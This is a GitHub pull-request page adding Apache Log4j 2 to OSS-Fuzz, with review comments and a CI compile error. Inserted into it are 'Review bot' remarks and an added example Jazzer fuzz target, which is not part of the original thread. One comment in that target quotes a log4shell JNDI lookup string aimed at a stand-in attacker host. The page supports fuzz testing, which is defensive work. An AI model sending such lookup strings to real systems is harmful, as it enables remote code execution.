[log4j2] initial integration #7016

Merged: 3 commits, Dec 15, 2021

Conversation

@0roman (Contributor) commented Dec 15, 2021

@@ -0,0 +1,11 @@
homepage: "https://logging.apache.org/log4j/2.x/"
language: jvm
primary_contact: "?"
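Review bot: `primary_contact: "?"` on the last shown line is a placeholder, and OSS-Fuzz sends crash reports and build-failure mail for the project to that address, so the integration would be silent until a real maintainer e-mail is put there before merge; `homepage` and `language: jvm` look right for a Jazzer-based target.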
Collaborator review comment on this hunk:

Please just move one of your emails to primary contact for you. We plan to start conversations with the log4j team soon.

@@ -0,0 +1,51 @@
#!/bin/bash -eu
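Review bot: `#!/bin/bash -eu` aborts the build on the first failing command and on any unset variable, which is the right default for an OSS-Fuzz build.sh and is why the CI run below stops at the first javac error, but it does not enable `pipefail`; if any step of the 51-line script downloads or extracts through a pipeline, a failure in an earlier stage is masked by the exit status of the last one. Consider `set -o pipefail` directly after the shebang.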
Collaborator review comment on this hunk:

Can you please check the CI build failure?

@fmeum fmeum force-pushed the log4j2 branch 2 times, most recently from 889998f to 2008abb on December 15, 2021 17:52
@inferno-chromium (Collaborator) commented:

Build compile is fine now, just the archiving part is failing

+ javac -cp /out/log4j-core.jar:/out/log4j-api.jar::/usr/local/lib/jazzer_api_deploy.jar:/out /src/Log4jFuzzer.java
/src/Log4jFuzzer.java:39: error: cannot find symbol
        DefaultConfigurationBuilder configBuilder = newDefaultConfigurationBuilder();
                                                    ^
  symbol:   method newDefaultConfigurationBuilder()
  location: class Log4jFuzzer
/src/Log4jFuzzer.java:40: error: cannot access Builder
        AppenderComponentBuilder fuzzingAppender = configBuilder.newAppender("nullAppender", FileAppender.PLUGIN_NAME);
                                                                ^
  class file for org.apache.logging.log4j.plugins.util.Builder not found
2 errors
ERROR:root:Building fuzzers failed.

You can verify the build works locally using https://google.github.io/oss-fuzz/advanced-topics/reproducing/#reproducing-build-failures

@jonathanmetzman (Contributor) left a review comment:

LGTM


FROM gcr.io/oss-fuzz-base/base-builder-jvm

RUN curl -L https://downloads.apache.org/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.zip -o maven.zip && \
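Review bot: the `RUN curl -L https://downloads.apache.org/maven/... -o maven.zip` line fetches the Maven distribution with no integrity check, so a tampered or truncated download would be baked into every fuzzer image built from this Dockerfile; pin the SHA-512 that Apache publishes beside the archive and verify it (for example `echo "<sha512>  maven.zip" | sha512sum -c`) before unpacking, failing the image build on mismatch. The archive also lands in the image's current directory rather than a dedicated location; `/work` is the conventional place in OSS-Fuzz images, as the reviewer's nit below notes.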
Contributor review comment on this line:

nit: Probably should go in /work

Contributor reply:

Can come in the next PR

@jonathanmetzman jonathanmetzman enabled auto-merge (squash) December 15, 2021 18:46
@inferno-chromium (Collaborator) commented Dec 15, 2021

@garydgregory @vy @rgoers - We would like to provide fuzz testing for log4j2 as part of OSS-Fuzz.
Code Intelligence (@fmeum and @0roman) have written the fuzzer and demonstrated that it is capable of finding the log4shell vulnerability. OSS-Fuzz is a community fuzzing service serving over 500 OSS projects (e.g. openssl, ffmpeg). There is no new work needed here, although you can apply for rewards to maintain and improve fuzzers, please see https://google.github.io/oss-fuzz/getting-started/integration-rewards/. Thank you for maintaining this library for the community, we truly appreciate all your efforts.
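For readers who want to see what "a fuzzer that can find log4shell" looks like in practice, here is an added example of a Jazzer fuzz target for Log4j 2. It is not the Code Intelligence fuzzer merged in this PR and is not taken from the log4j project; it only uses the same programmatic ConfigurationBuilder API that the javac output above shows the PR's fuzzer using. Assumptions: Log4j 2 core and API jars plus `jazzer_api_deploy.jar` on the classpath (as in the javac line above), a Linux build so the appender can write to `/dev/null`, a Log4j release at or before 2.14.1 (where `${...}` lookups in log messages were still expanded by default; 2.15.0 turned that off), and Jazzer's built-in sanitizer for remote `javax.naming` lookups, which reports the attempted JNDI resolution as a finding without any LDAP server being contacted. The class name `Log4jMessageFuzzer` and the appender name `discard` are mine.

```java
// Added example, not code from the PR or from Apache Log4j.
// A Jazzer fuzz target that pushes fuzzer-generated strings through
// Log4j 2's message formatting path, where the log4shell lookup fired.
import com.code_intelligence.jazzer.api.FuzzedDataProvider;
import org.apache.logging.log4j.Level;
import org.apache.logging.log4j.core.LoggerContext;
import org.apache.logging.log4j.core.config.Configurator;
import org.apache.logging.log4j.core.config.builder.api.AppenderComponentBuilder;
import org.apache.logging.log4j.core.config.builder.api.ConfigurationBuilder;
import org.apache.logging.log4j.core.config.builder.api.ConfigurationBuilderFactory;
import org.apache.logging.log4j.core.config.builder.impl.BuiltConfiguration;

public class Log4jMessageFuzzer {
    private static org.apache.logging.log4j.core.Logger logger;

    // Runs once per fuzzing process. The configuration is built in code so the
    // target does not depend on a log4j2.xml being on the classpath.
    public static void fuzzerInitialize() {
        ConfigurationBuilder<BuiltConfiguration> builder =
                ConfigurationBuilderFactory.newConfigurationBuilder();
        builder.setStatusLevel(Level.OFF); // keep Log4j's own status log quiet

        // A File appender pointed at /dev/null (assumption: Linux). A Null appender
        // would be faster but never applies a layout, and it is the PatternLayout's
        // %m conversion that expands ${...} lookups in affected releases, so the
        // message must actually be formatted for the bug to be reachable.
        AppenderComponentBuilder discard = builder.newAppender("discard", "File")
                .addAttribute("fileName", "/dev/null")
                .add(builder.newLayout("PatternLayout")
                        .addAttribute("pattern", "%m%n"));
        builder.add(discard);
        builder.add(builder.newRootLogger(Level.ALL)
                .add(builder.newAppenderRef("discard")));

        LoggerContext context = Configurator.initialize(builder.build());
        logger = context.getLogger(Log4jMessageFuzzer.class.getName());
    }

    // Called once per input. The entire input becomes the log message, so an
    // input such as "${jndi:ldap://attacker.example/a}" reaches Log4j's JNDI
    // lookup on vulnerable releases. Jazzer's remote-JNDI sanitizer (assumed
    // to be active, as it is in OSS-Fuzz's JVM builder) hooks
    // javax.naming.Context.lookup and reports the attempt as a finding.
    public static void fuzzerTestOneInput(FuzzedDataProvider data) {
        String message = data.consumeRemainingAsString();
        logger.error(message);
    }
}
```

Random byte mutation rarely assembles `${jndi:ldap://` on its own, so in practice the target is paired with a libFuzzer dictionary (an OSS-Fuzz `.dict` file with tokens such as `"${"`, `"jndi:"`, `"ldap://"`, `"}"`) or a small seed corpus; with either, the sanitizer finding on a 2.14.1 build appears within seconds, while the same target on 2.15.0 or later runs clean because message lookups are no longer expanded.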

@jonathanmetzman jonathanmetzman merged commit c2f70d8 into google:master Dec 15, 2021
@fmeum fmeum deleted the log4j2 branch December 15, 2021 18:56
@vy commented Dec 20, 2021

@inferno-chromium That is simply awesome! Thanks so much! As you might imagine 😅, the entire crew is swamped with other priorities. Would you mind sharing this news via an email to the dev@logging.apache.org as well, please?

@inferno-chromium (Collaborator) replied:

> @inferno-chromium That is simply awesome! Thanks so much! As you might imagine 😅, the entire crew is swamped with other priorities. Would you mind sharing this news via an email to the dev@logging.apache.org as well, please?

@vy - Yes, we plan to sync on this early Jan once fires are out. Hope you guys can relax from Christmas, thanks again for amazing work on incident response.

MartinPetkov pushed a commit to MartinPetkov/oss-fuzz that referenced this pull request Aug 15, 2022